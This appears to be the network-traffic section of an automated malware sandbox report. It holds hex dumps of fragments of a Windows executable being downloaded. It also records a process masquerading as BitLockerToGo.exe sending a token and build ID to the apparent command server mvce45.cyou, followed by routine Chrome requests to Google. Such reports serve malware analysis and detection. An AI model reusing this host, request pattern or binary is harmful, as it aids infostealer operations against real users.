                                                                                                                                                                                                                                                                                                                  Content-Length: 2459136
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:07 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                  Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                                                                                                                  Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                                                                                                                                                                  Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                                                                                                                                                                  Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                  Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                                  Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                                                                                                                                                                  Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                                                                                                                                                                  Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:08 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                                                                                                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  10192.168.2.84972049.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:13 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 489
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:13 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------JEHDHIEGIIIDHIDHDHJJCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:14 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  11192.168.2.849723172.217.21.364435904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:19 GMT
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-p6E_XQ0Ag21cXeuUKr9jsg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC124INData Raw: 33 30 33 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 69 67 68 20 70 6f 74 65 6e 74 69 61 6c 20 6e 65 77 20 65 70 69 73 6f 64 65 73 22 2c 22 66 69 6e 61 6c 20 66 61 6e 74 61 73 79 20 78 69 76 20 6d 6f 62 69 6c 65 22 2c 22 73 70 61 63 65 78 20 73 74 61 72 73 68 69 70 20 74 65 73 74 20 66 6c 69 67 68 74 22 2c 22 6d 61 67 6e 65 74 69 63 20 6e 6f 72 74 68 20 70 6f 6c 65 20 6d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 303)]}'["",["high potential new episodes","final fantasy xiv mobile","spacex starship test flight","magnetic north pole m
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC654INData Raw: 6f 76 69 6e 67 22 2c 22 65 6c 69 20 6d 6f 72 67 61 6e 20 63 75 62 73 20 74 72 61 64 65 22 2c 22 77 65 61 74 68 65 72 20 74 6f 72 6e 61 64 6f 20 77 61 72 6e 69 6e 67 22 2c 22 63 6d 61 20 61 77 61 72 64 73 20 32 30 32 34 20 77 69 6e 6e 65 72 73 22 2c 22 77 6f 72 64 6c 65 20 68 69 6e 74 20 6e 6f 76 65 6d 62 65 72 20 32 31 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67
                                                                                                                                                                                                                                                                                                                  Data Ascii: oving","eli morgan cubs trade","weather tornado warning","cma awards 2024 winners","wordle hint november 21"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goog
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  12192.168.2.849729172.217.21.364435904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:19 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 697903402
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:20 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:20 UTC372INData Raw: 32 30 61 37 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
